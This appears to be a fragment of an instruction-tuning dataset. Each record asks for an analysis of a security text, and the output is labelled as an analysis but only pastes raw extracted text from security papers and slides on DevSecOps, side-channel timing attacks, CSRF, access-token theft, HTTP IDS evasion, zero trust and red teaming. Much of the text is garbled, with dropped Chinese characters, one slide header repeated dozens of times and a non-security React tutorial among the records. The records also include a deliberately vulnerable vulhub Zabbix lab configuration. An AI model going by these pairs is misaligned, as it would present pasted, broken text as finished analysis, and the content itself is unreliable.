logos, and images only in an editorial fashion and to the benefit of the trademark owner, with no intention of infringement of the trademark. The use in this publication of trade names, trademarks, service marks, and similar terms, even if they are not identified as such, is not to be taken as an expression of opinion as to whether or not they are subject to proprietary rights. While the advice and information in this book are believed to be true and accurate at the date of publication, neither the authors nor the editors nor the publisher can accept any legal responsibility for any errors or omissions that may be made. The publisher makes no warranty, express or implied, with respect to the material contained herein. Managing Director, Apress Media LLC: Welmoed Spahr Acquisitions Editor: Jonathan Gennick Development Editor: Laura Berendson Coordinating Editor: Jill Balzano Cover image designed by Freepik (www.freepik.com) Distributed to the book trade worldwide by Springer Science+Business ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDevSecOps 2020 Dev Sec Ops FreeBuf 咨询荣誉出品 D e v S e c O p s 企 业 实 践 白 皮 书 关于安全聚合力系列 独行难众行远安全聚合力系列报告旨在凝聚网络安全业内甲方安全专家共同产出指导性前瞻性的技术及行业实践 研究报告为企业提供更详实更易落地的同行业安全建设参考 关于报告 DevSecOps作为安全领域中逐渐步入成熟期的技术体系从最初的理念到如今少量的成功实践案例中间经历了大量的 探索与发展如今很多企业已经意识到DevSecOps的重要性并想要有所实践但仍然面临大量挑战 本次FreeBuf咨询邀请研发运营一体化DevOps能力成熟度模型部分编者及国内DevSecOps实践先行者携程腾讯 国内某知名金融机构等分别从DevSecOps工具链及企业落地实践等方面深入探索研究共同输出一份DevSecOps企业实 践白皮书为企业CSO提供安全建设的有效参考 关于 FreeBuf 咨询 FreeBuf.COM网络安全行业门户每日发布专业的安全资讯技术剖析分享国内外安全资源与行业洞见是网络安全从业 者与爱好者广泛关注的行业社区平台 FreeBuf咨询集结了安全行业经验丰富的安全专家和分析师, 依托FreeBuf 安全智库常年对信息安全技术行业动态保持 追踪, 洞悉安全行业现状和趋势, 呈现最专业的研究与咨询服务 FreeBuf 咨询荣誉出品 D e v S e c O p s 企 业 实 践 白 皮 书 报告出品团队 甲方专家按姓名首字母排序 FreeBuf咨询 出品人/ 尤文鲍弘捷高冰洋 编者/ 武文婧周雪静张志鹏 顾问/ 徐钟豪 行业分析师/ 宋丹丹 设计指导/ 姚媛 携程信息安全高级总监15年信息安全工作经验大学时便活跃于各类黑客论坛和黑客杂志曾在多个 技术峰会QconGitcXfungfoo发表主题演讲 凌 云 赵 锐 世界500强企业中国区信息安全和风险负责人国家网络安全周上海网络安全金牌讲师DevOps标 准工作组核心编写专家CSA云安全联盟专家CCSF优秀首席信息安全官 庄 飞 金融机构应用安全负责人15年+产品研发及安全从业经历DevOps峰会金牌讲师DevOps标准编写专 家曾在EISSDOISTiDCIS等峰会发表主题演讲 张 祖 优 腾讯云产品安全负责人腾讯安全云鼎实验室高级安全工程师12年安全攻防经验曾在KConWOT ISFQConBlackHat网络安全创新大会DevOps在线峰会等发表主题演讲Seebug创始人 Pocsuite核心开发者 FreeBuf 咨询荣誉出品 D e v S e c O p s 企 业 实 践 白 皮 书 CHAPTER ONE 第一章 2020 DevSecOps 国内发展现状 1.1 DevOps 安全挑战及转型 1.2 DevSecOps 国内发展现状 02 02 05 2 CHAPTER TWO 第二章 DevSecOps 合规趋势 研发运营一体化DevOps能力成熟度模型 3 CHAPTER THREE 第三章 企业 DevSecOps 落地与指导 07 08 08 09 07 3.1 DevSecOps 落地挑战 3.2 DevSecOps 落地与指导 3.2.1 安全文化变革 3.2.2 安全左移流程 3.2.3 构建DevSecOps工具链 目 录 C A T A L O G FreeBuf 咨询荣誉出品 D e v S e c O p s 企 业 实 践 白 皮 书 4 CHAPTER FOUR 第四章 某金融机构 DevSecOps 实践 4.1 安全背景简介 15 15 21 22 14 14 15 6 CHAPTER SIX 第六章 总结与展望 5.4 企业安全工具链实践 5.4.1 开源组件安全扫描(SCA) 5.4.2 源代码安全扫描SAST 5.4.3 交互式应用安全测试IAST 5.4.4 越权检测 5.4.5 数据库审计 5.4.6 漏洞全生命周期管理 5 CHAPTER FIVE 第五章 携程 DevSec -Ops 实践 5.1 安全背景介绍 5.2 企业安全文化建设 5.3 企业安全流程建设 6.1 头部行业加快实践步伐 6.2 实践需贴合企业属性 6.3 安全是每个人的责任 26 26 27 28 30 31 25 25 26 33 33 34 26 4.2 企业安全文化建设 4.3 企业安全流程建设 4.3.1 安全策略 4.3.2 安全活动及工具链应用 4.3.4 企业安全平台实践 4.3.5 DevSecOps安全度量指标 FreeBuf 咨询荣誉出品 CHAPTER ONE 第一章 2020 DevSecOps 国内发展现状 FreeBuf 咨询荣誉出品 第一章 2020 Dev", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n侧信道分析 感谢北京理学-王安教授的讲解 0x00 什么是侧信道 什么是侧信道个简单的例就是某些泡和饮料中奖以可能会随机附赠腿肠带有腿肠的桶和不带 腿肠的桶重量不样摇晃起来响声不样通过摇晃我们能简单分析出哪桶是中奖了的泡这商不希望我们 知道的信息这就是侧信道这样的例在活中还有很多如对于区按键门禁长期按的个键上的油脂 指纹磨损同样也是我们猜解其密码的侧信道信息如个六位数密码的门禁猜测空间是106 当我们获知 其密钥的组合时我们猜测空间就降低到了 6! 相对于偏社会程学点的例看见区家扔垃圾他们扔的垃圾有婴奶粉罐头瓶啤酒瓶少 量烟头头发丝团外卖盒等根据这些侧信息能得出什么结论呢 猜测是这家三男主爱饮酒主留长发有个两岁岁的婴男主没有作或者作时间较为 由主外出作到很晚根据婴奶粉价格还可以估算出该家庭的致情况如果婴奶粉属于中等偏上的价 位那么就是男主是作家类的可以在家作的职业主的作是家庭主要稳定收来源 为什么呢在这个例中侧信息怎么映射到真实信息上去的呢 因为般母都会选择给婴喝承受价位内最好的奶粉 所以据此可以很好估算出家庭经济状况在家三 的情况下垃圾中有外卖盒反映不常做饭结合啤酒瓶推测出主饭点概率不在家也就是加班到很晚在 有婴需要照顾的情况下加班到很晚那就说明主的经济来源是家柱结合烟头和有婴的情况亦可 以推测男主直 在家可能没作或者从事作家类的由职业结合烟头判断作家类职业概率整体佳通状 况可以看出男主能做到有收但是不多也不稳定 归正传那什么是侧信道呢 我的理解是侧信道就是在做正常为的时候为本所带来的对环境的扰动产的各种信息 核思路就是为本不样对物理环境的扰动不样扰动提供的信息也不样有者可以通过分析这些 侧信息反推出为本这就是侧信道 0x01 密码学中的侧信道 经典密码学中基本假设是密钥计算时是安全的攻击者不可接触的 侧信道分析中通过不同的视去审视密码设备在运过程中与外界环境存在的物理交互通过这些物理扰动 信息泄露可获取密钥信息 计时攻击 [CRYPTO 1996 提出] P. Kocher: Timing Attacks on Implementations of Diffie-Hellman, RSA, DSS, and Other Systems. CRYPTO 1996, LNCS, vol. 1109, pp. 104-113, Springer, Heidelberg (1996) 计时攻击运较泛在很多场景都可以使如SQL injection的时间盲注如些软件实现的密码学 操作或者密钥验证算法如经典的linux的strcmp命令其实际实现式是逐个字节进较 如果我们进测试的话如6位数字密钥调strcmp进较当我们第位猜测正确的时候strcmp会继续 较下字节错误的话就会终在运算时间上是有不差异的我们可以逐位进猜解把猜解空间从106 次降低为60基本等于破解密码 static inline int strcmpconst char * cs,const char * ct { int d0, d1; register int __res; __asm__ __volatile__ \"1:\\tlodsb\\n\\t\" //装串操作数即从DS段中esi位置的字符传送到 al 寄存器然后 esi 根据 DF指向串中下个元素 DF=0增加DF=1减少 \"scasb\\n\\t\" //扫描串操作数即从 al 中减去ES段中edi位置的字符不保留结果只改变标志 CF,AF,PF,SF,OF,ZF若字符相等ZF=1,否则ZF=0若DS段中字符于ES段中串则CF=1后sbb运算 会出现-1 \"jne 2f\\n\\t\" //如果两个字符不相等则转到标号 \"testb %%al,%%al\\n\\t\" //如果al中全是0则ZF=1(逻辑与结果为0)如果字符串结束遇到null零 \"jne 1b\\n\\t\" //如果ZF=0逻辑与结果不为0即字符串未结束则继续较 \"xorl %%eax,%%eax\\n\\t\" //身异或结果为0CF=0eax清空 \"jmp 3f\\n\" //向前跳3:退出返回值为0 \"2:\\tsbbl %%eax,%%eax\\n\\t\" //32位sbb src,destdest-src-CF存dest如果CF=1 则结果为-1全是1否则为0结果为-1时标志位CF=1SF=1,OF=1,ZF=0,PF=1) \"orb $1,%%al\\n\" //对0位或1保证结果为-1或者1如果结果为0或1之后为1即字符返回 1字符返回-1 \"3:\" :\"=a\" __res, \"=&S\" d0, \"=&D\" d1 :\"1\" cs,\"2\" ct; return __res; } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 计时攻击就", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& https:// github.com/ RedBalloonShena nigans/ MonitorDarkly A Monitor Darkly Ang Cui, PhD | Jatin Kataria 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& DDC& http://caxapa.ru/thumbs/349020/ddcciv1.pdf 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEF", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCSRF: Yeah, it still works Mike Bailey, skeptikal.org Russ McRee, holisticinfosec.org DISCLAIMER:  The views, opinions, and methodologies discussed here do not reflect those of our employers, thus no smack talk herein is to be attributed to anyone other than Mike and Russ. The XSS Epidemic: Discovery, disclosure, and remediation Cross-site request forgery  Bad News  CSRF is nasty, it's everywhere, and you can't stop it on the client side  Good News  It can do neat things  CSRF is likely amongst the lamest security bugs available, as far as \"cool\" bugs go In case you didnt know  Crosssite request forgery, CSRF, XSRF  In essence, the attack forces another user's browser to do something on your behalf  If that user is an authenticated user or an administrator on a website, the attack can be used to escalate privilege  Were of the belief that, much like its XSS cousin, failure to mitigate this vulnerability through secure coding practices borders on the negligent CSRF: Yeah, it still works  Weve identified an endless stream of applications, platforms, critical infrastructure devices, and even wormable hybrid attacks, many of which require little or no Javascript (XSS)  The key takeaway is this  a vulnerability that is so easily prevented can lead to absolute mayhem, particularly when bundled with other attacks. Worse still, identifying the attacker is even more difficult as the attack occurs in the context of the authenticated user CSRF: Yeah, it still works  Well show you how to prevent it later  but wed rather show you how to break things with it CSRF: Yeah, it still works  A common argument from vendors / developers who dont want to fix CSRF vulns when we report them  Someone has to click a link, its their problem if they do  Heres a secret  Everyone clicks links  Just ask the CEO of StrongWebMail whos out $10,000  $3300 of which is in Mikes pocket right now CSRF: Yeah, it still works  Tools of the trade  Tamper Data, HackBar  Ideal for seeing form variables / parame", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: 一起补充 --- <center><h1>一起补充</h1></center> --- ## 如何一起补充文库 ### 补充格式 对于云服务和原生安全的补充格式需要为 MarkDown 格式对于云安全资源类的补充直接邮件正文发给我就行啦 ### 补充类型 * 云服务安全原创翻译都可以 * 云原生安全原创翻译都可以 * 云安全资源类一个 Tips一个工具一个网站等等都可以 ### 联系方式 可以将要补充的内容直接发送到邮箱 `teamssix#wgpsec.org` 即可#记得替换成 @ > 补充文库后文库首页贡献者会出现你的头像和 ID 哦 ~ ## 注意事项 * 补充内容需要符合上面的格式和类型 * 如果 MarkDown 中有图片可以使用图床或者 md 文件和图片一起打个压缩包进行发送 * 不收录未公开漏洞和 0day 漏洞 <Vssue /> <script> export default { mounted () { this.$page.lastUpdated = \"2022年4月14日\" } } </script>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### Context `context`是在 **react @ 0.14** 版本以后发布的一个高级且实验性的功能有可能在未来做出更改不推荐使用! #### 使用 Context 的原因 实现 **越级**传递`props` #### 例 祖父组件 ``` import React, { Component } from 'react' import propTypes from 'prop-types' import Father from './Father' class GrandFather extends Component { getChildContext(){ return { hello:\"son\" } } render(){ return ( <div className=\"grandFather\"> <h1>GrandFather</h1> <Father /> </div> ) } } GrandFather.childContextTypes = { hello:propTypes.string } export default GrandFather ``` 父组件 ``` import React, { Component } from 'react' import Son from './Son' class Father extends Component { render() { return ( <div className=\"father\"> <h1>Father</h1> <Son /> </div> ) } } export default Father ``` 子组件 ``` import React, { Component } from 'react' import propTypes from 'prop-types' class Son extends Component { render() { console.log(this.context) return ( <div className=\"son\"> <h1>Son</h1> <h1>{this.context.hello}</h1> </div> ) } } Son.contextTypes = { hello:propTypes.string } export default Son ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nsyslog === 系统默认的日志守护进程 ## 补充说明 **syslog** 是Linux系统默认的日志守护进程默认的syslog配置文件是/etc/syslog.conf文件程序守护进程和内核提供了访问系统的日志信息因此任何希望生成日志信息的程序都可以向 syslog 接口呼叫生成该信息 几乎所有的网络设备都可以通过syslog协议将日志信息以用户数据报协议(UDP)方式传送到远端服务器远端接收日志服务器必须通过syslogd监听UDP 端口514并根据 syslog.conf配置文件中的配置处理本机接收访问系统的日志信息把指定的事件写入特定文件中供后台数据库管理和响应之用意味着可以让任何事件都登录到一台或多台服务器上以备后台数据库用off-line(离线) 方法分析远端设备的事件 通常syslog 接受来自系统的各种功能的信息每个信息都包括重要级/etc/syslog.conf 文件通知 syslogd 如何根据设备和信息重要级别来报告信息 ### 使用方法 在/var/log中创建并写入日志信息是由syslog协议处理的是由守护进程sylogd负责执行每个标准的进程都可以用syslog记录日志可以使用logger命令通过syslogd记录日志 要向syslog文件/var/log/messages中记录日志信息 ```shell logger this is a test log line 输出 tail -n 1 messages Jan 5 10:07:03 localhost root: this is a test log line ``` 如果要记录特定的标记tag可以使用 ```shell logger -t TAG this is a test log line 输出 tail -n 1 messages Jan 5 10:37:14 localhost TAG: this is a test log line ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nT e c h n i c a l A n a l y s i s o f A c c e s s T o k e n T h e f t a n d M a n i p u l a t i o n REPORT Technical Analysis of Access Token Theft and Manipulation 2 REPORT Table of Contents 3 Introduction 5 Access Token Creation and User Account Control 7 Access Token Manipulation 8 Looking at the Code: Technique 1: CreateProcessWithTokenW 9 Looking at the Code: Technique 2: ImpersonateLoggedOnUser 9 Looking at the Code: Technique 3: CreateProcessAsUser 10 Looking at the Code: Technique 4: SetThreadToken ResumeThread 11 Other SYSTEM Level Processes 14 Coverage 14 MITRE ATT&CK 15 Detecting Access Token Manipulation Attacks 15 YARA Rule 16 Conclusion 16 About the Author 16 Chintan Shah 17 About McAfee 17 McAfee ATR Connect With Us Author This report was researched and written by:  Chintan Shah Subscribe to receive threat information. Introduction Privilege escalation is one of the primary tasks malware must perform to be able to access Windows resources that require higher privileges, perform privileged actions (like executing privileged commands, etc.) on the system, and move laterally inside the network to access and infect other systems. Access token manipulation attacks are massively adopted and executed by malware and advanced persistent threats to gain higher privileges on a system after the initial infection. These attacks are also executed to perform privileged actions on behalf of other users, which is known as Access Token Impersonation. When a user is authenticated to Windows, it creates a logon session for the user and returns the user SID (Security Identifier) and SID of the groups to which the user belongs, which is eventually used to control access to various system resources. Local Security Authority (LSA) creates the access token for the user. This access token is primarily a kernel object that describes the security context of the process or the thread, as described here. Subsequently, all the processes started in the context of the current logged-", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nversion: '2' services: server: image: vulhub/zabbix:3.0.3-server command: server depends_on: - mysql environment: - DATABASE_HOST=mysql - DATABASE_PORT=3306 - DATABASE_USER=root - DATABASE_PASS=root - DATABASE_NAME=zabbix agent: image: vulhub/zabbix:3.0.3-server command: agent depends_on: - mysql - server environment: - ZBX_SRV_HOST=server - ZBX_SRV_HOST_ACT=server - DATABASE_HOST=mysql - DATABASE_PORT=3306 - DATABASE_USER=root - DATABASE_PASS=root - DATABASE_NAME=zabbix mysql: image: mysql:5 environment: - MYSQL_ROOT_PASSWORD=root - MYSQL_DATABASE=zabbix volumes: - ./database/:/docker-entrypoint-initdb.d/ web: image: vulhub/zabbix:3.0.3-web depends_on: - server - mysql environment: - DATABASE_HOST=mysql - DATABASE_PORT=3306 - DATABASE_USER=root - DATABASE_PASS=root - DATABASE_NAME=zabbix - ZBX_SRV_HOST=server - ZBX_SRV_PORT=10051 ports: - \"8080:80\"", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 HTTP IDS Evasions Revisited Daniel J. Roelker AbstractThis paper describes two general IDS evasion techniques and applies them to the HTTP protocol. These techniques are illustrated using some older types of HTTP evasions and some new HTTP evasions. The different types of evasions occur in both the Request URI portion of the HTTP protocol and by using the protocol standard in HTTP/1.0 and HTTP/1.1. The evasions within the Request URI address evasion types possible in encoding and obfuscating the URL and parameter fields in the Request URI. The various methods of valid URL encodings for both the Apache and Internet Information Server are explained and examples given for each type of encoding. HTTP IDS evasions are also demonstrated using the HTTP protocol properties against the IDS. These evasions incorporate the request pipeline property and the content-encoding header. This paper should help explain how HTTP IDS evasions work and give the reader enough knowledge to generate their own HTTP IDS evasions using these general principles and examples. Index Termscomputer security, hypertext transfer protocol, intrusion detection, web scanning I. INTRODUCTION H TTP IDS evasions have been popular since Rain Forest Puppys (RFP) web scanner, whisker, was first released to the public [1]. Many of the original HTTP IDS evasions were contained in that first release, from multiple slashes that would obfuscate directories, to the more advanced evasions, like inserting HTTP/1.0 in the URL to evade an algorithm that an IDS might use to find the URL in a packet. Besides the evasions that whisker presented, there were other types of HTTP obfuscations that were being propagated as well. One of these was obfuscating a URL by using an absolute URI vs. a relative URI [2]. While these other types of evasions were interesting, they were not as evasive or popular as the basic whisker scans. The next popular evasion came about with the public release by RFP of the UTF-8 unicode encoding ex", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n零信任在中通黑灰产对抗的实践 零信任在中通黑灰产对抗的实践 中通快递 朱颖骏 目录 CONTENT 目录>> 02 04 03 成效 01 背景 挑战 零信任安全 总结 05 背景 01 背景 01 背景 业务背景 170亿 业务量全球第一 2000亿港元 纽约/香港上市 50万+ 中通人遍布全国 3万+ 网点达全国 01 背景 监管背景 信息安全监管 落实企业网络安全主体责任 加强个人用户信息保护 提高企业的信息安全意识水平 中华人民共和国网络安全法 关键信息基础设施安全保护条例 中华人民共和国个人信息保护法 中华人民共和国数据安全法 挑战 02 挑战 技术挑战 自研1000+应用 外购本地部署公有云部署 频繁变动的人员设备和组织 庞大的用户数据 4亿+ 业务流程隐私数据 业务分支机构全球分布 4W+网点 技术架构多样 业务变更频繁 敏感数据庞大 组织分布广泛 安全挑战 OWASP TOP 10 常规漏洞 骗取帐号骗取认证信息威逼利诱 社工APT攻击 利用职务获取利益 内鬼内外勾结 0Day未知手法 零信任安全 03 零信任安全 零信任理念 身份认证授权 IAM 工作负载微隔离技术 MSG 用户侧软件定义边界 零信任 Never TrustAlways Verify SDP 零信任原则 网络身份的治理原则 所有资源操作的认证与授权都是动态的并需要严格执行 01 资源的治理的原则 企业的所有资产都被视为资源 企业应确保所拥有的资产都应处于最安全的状态 02 应用于数据访问的原则 所有的通信在安全的方式下完成(网络位置并不安全) 基于每个会话的细粒度最小化授权 访问资源的权限由动态策略决定 包括客户端应用服务资 源等多中信息 企业尽可能多地收集有关资产网络基础设施和通信的当前状态 的信息并使用这些信息来改善其安全状况 03 漏洞 社 工 0Day 内 鬼 零信任与业务风控 零信任与业务风控 多维数据支撑 多样策略执行点 身份权限资源的安全状态 认证服务 网关层 终端 访问主体属性 环境信息 访问客体信息 存在的问题 LOREM IPSUM DOLOR 终端多不受控 密码被泄露 帐号管理混乱 权限管控混乱 权限管控混乱 事件追溯难 探索路线 01 02 03 04 统一身份统一权限 零信任网关SDP 免密登录/MFA 基于信任评估的动态访问控制策略 统一身份 集中 管控 帐号创 建 转岗离 职 管理 自动化 自助 服务 风险预 警 全生命周期 身份同 步 多身份类型 灵活定 义 多租户 EIAM CIAM IoT 身份互 通 身份属 性 身份平台 混合云 协议支 持 用户目 录 SCIM 自研 应用 外采应 用 遗产应 用 统一认证 跨应用跨帐号体系单点登录 支持多种认证协议 SAMLOAuth2.0OIDCJWTLDAP 支持多种认证方式  三方认证企业联邦认证企业社交认证个人社交认证  生物认证指纹人脸虹膜等  非生物认证帐号密码手机OTP动态令牌数字证书 MFA编排  自定义认证流程  认证自由编排串行/并行组合认证多步骤认证  认证前中后触发事件灵活配置 框架集成  将认证服务封装为统一API组件SDK  支持各种开发框架语言快速对接  一次对接一键化拥有全部认证方式 智能认证  结合访问时间位置习惯设备关系行为等进行 全面评估根据使用场景智能控制认证级别 统一权限 入职赋权 通用 权限授权 权限 授权审计 特殊 权限申请 权限审批 权限 使用审计 吊销 回收 业务闭环 权限 模型设计 授权链 行权 鉴权 权限审计 风险评估 权限治理 管理闭环 接入应用1000+ 权限条目 30000+ 零信任网关 零信任流量治理思路 第一步 全面身份化 构建信任 01 02 03 04 第二步 全流量覆盖 全资源保护 第三步 分层治理 流量漏斗 第四步 行为分析 动态访问控制 资源访问典型处理过程 Step 01 Authenticated Step 03 Bot Detection Step 05 Policy Execution Step 02 Authorized Step 04 Attack Detection 员工安全工作台 安全 DLP 网络准入 证书及可 信 杀毒防护 SDP 安全中心 协作 业务 小程序 应用门户 开发框架 公众号 即时通讯 日程 音视频会议 投屏 推送体系 云盘 工作流 企业通讯录 文档中台 邮箱 有端模式的SDP 问题发现与取证 过去 现在 行为日志 依赖业务接入 用户在所有系统的所有行为日志 数据混乱 域名资产理不清 应用URL与权限对应关系清晰 拦截方式 拦截方式单一 IP用户手机号组织等多维拦截 证据 现场证据缺失 用户实名与多种行为挑战 风控 应用 系统 用户 设备 访问控制决策点 信息 风险", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n快手纵深攻防体系建设 分享者简介 姓名黄浩 (浩天) 职务快手安全蓝军(攻)负责人 经历十余年信息安全从业经历主打攻防能力建设 目录 一四维时空红蓝对抗推演 二面对面的纵深攻击演练 三背对背的目标斩首行动 四自适应的纵深防御体系 一四维时空红蓝对抗推演 一四维时空红蓝对抗推演 纵深这个词空间换取时间提到空间时间又会联想到爱因斯坦的相对论四维时空你可以 洞察过去预见未来红蓝对抗演练更像是四维时空的产物将未来可能发生的威胁和风险提前感知所以 蓝军更像是未来部队 一四维时空红蓝对抗推演 红蓝对抗是对未来可能发生的安全风险进行推演将外部风险内部风险以及不可预见的未知风险进行 提前排查梳理 一四维时空红蓝对抗推演 红蓝对抗演练存在的意义在于目标明确价值导向正向作用攻防为核 二面对面的纵深攻击演练 二面对面的纵深攻击演练 安全蓝军的建立是为了发现更多的安全风险面对面的这种形式是更符合纵深攻击演练的定义的纵深空 间换取时间在每一层做对抗用最短的时间获取每层空间可能存在的最多的安全风险是一个你知我攻我知 你防的演练模式 二面对面的纵深攻击演练 面对面的红蓝对抗要关注哪些空间网络空间[互联网办公网生产网]物理空间意识空间 适用场景 1跨空间的红蓝对抗(入侵渗透) 2基础安全服务测评(安全产品) 二面对面的纵深攻击演练 1跨空间的红蓝对抗 攻防双方面对面站在不同空间进行对抗将节约的时间用在覆盖更多安全风险上战后攻防复盘完善 防御规则强化攻击能力 二面对面的纵深攻击演练 2基础安全服务测评 安全蓝军针对基础安全服务进行有效性测评包括WAFHIDS零信任体系NIDS蜜罐等诸多自研 产品进行对抗快速排查梳理在防御策略上的缺失进行加固并以行业优秀的同类产品为参照 二面对面的纵深攻击演练 方案优势 思考痛点 三背对背的目标斩首行动 三背对背的目标斩首行动 背对背的红蓝对抗目的是为了验证安全防御体系在真实的攻击场景下所表现出的威胁的发现能力告警能 力阻断能力应急处置能力分析溯源能力等检验安全产品有效性的同时也检验安全服务的质量同时攻 击角色不仅包括内部安全蓝军也应该包括泛蓝军(外部安全能力)往往不分时间不分地点不分方式目标 明确我们称之为斩首行动 三背对背的目标斩首行动 背对背的红蓝对抗往往是实战方式适用4种场景1由外到内入侵渗透2线上产品漏洞挖掘3 移动安全防护逆向4业务安全分析溯源 三背对背的目标斩首行动 方案亮点 四自适应的纵深防御体系 四自适应的纵深防御体系 1自适应安全架构 基准化系统 攻击预测 主动探索分析 防御手段升级 系统补救 调查取证 加固隔离系统 误导攻击者 攻击拦截 处理事件 确认及定性危险 事件检测 基准化系统 攻击预测 主动探索分析 防御手段升级 系统补救 调查取证 处理事件 确认及定性危险 事件检测 资产搜集 系统安全基线 网络安全基线 漏洞订阅 威胁情报 威胁预警 风险预警 账号和认证管理 访问控制管理 安全基线管理 补丁管理 终端和主机隔离 漏洞管理 防御类沙箱 安全开发 蜜罐 入侵防御系统 事件溯源 关联分析 网络隔离 账户封锁 进程阻断 主机网络隔离 终端网络隔离 流量检测 应用检测 终端入侵检测 恶意软件检测 主机入侵检测 威胁情报 关联分析 分析类沙箱 数据层数据分类分级 应用层数据分类分级 终端层数据分类分级 数字水印 数据版权标识 人员评估 威胁预警 风险预警 加固隔离系统 误导攻击者 攻击拦截 访问控制管理 数据脱敏 数据加密 外传数据管控 多方计算 数据沙箱 差分隐私 数据蜜罐 终端外设管控 事件溯源 关联分析 违规处理 账户封锁 进程阻断 终端网络隔离 流量检测 应用检测 终端检测DLP 威胁情报 关联分析 重点人员检测 舆情监控 四自适应的纵深防御体系 2纵深攻防体系推演大盘 四自适应的纵深防御体系 3红蓝对抗攻防双方共建指标 指标类型 2021 Q2 2021 Q3 2021 Q4 2022 Q1 红蓝对抗次数 N次 N次 N次 N次 发现的风险数 N+个 N+个 N+个 N+个 发现的攻击路径数 N+个 N+个 N+个 N+个 识别的共性问题数 N+个 N+个 N+个 N+个 被检测率 <X0% <X0% <X0% <X0% 被检测时间 X分钟 X分钟 X分钟 X分钟 被阻断率 <X0% <X0% <X0% <X0% 被阻断时间 X分钟 X分钟 X分钟 X分钟 ...... ...... ...... ...... ...... 总结", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Hackover CTF 2018 Team: nazywam, pwn.m0d3, shalom, msm, chivay, sasza, rev ### Table of contents * [Hummel (misc)](misc_hummel) * [Holy graal (pwn)](pwn_graal) * [Bwv2342 (re)](re_bwv) * [I am many (for)](for_many) * [Ez web (web)](web_ez) * [I love hedda (web)](web_hedda) * [Who knows (web)](web_whoknows) * [Cyberware (web)](web_cyberware)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 2 Public safety may be an obscure, public-sector part of the telecom/tech crowd, but the crowd is actually quite sophisticated. We consulted with members of the standards community before attempting these attacks to determine what attack surfaces they deemed most vulnerable. After completing our in-lab research, we disclosed a summary of our findings to members of NENAs Development Steering Council. 3 Despite the addition of a few new originating network types in the last 20-25 years, 9- 1-1 remains largely a product of the telephone age, not the computer age. (And definitely not the Internet age!) 4 In the beginning, the Bell System created the PSTN, and the trust model was void, and without form  because they were THE PHONE COMPANY, damnit! The network structure (and 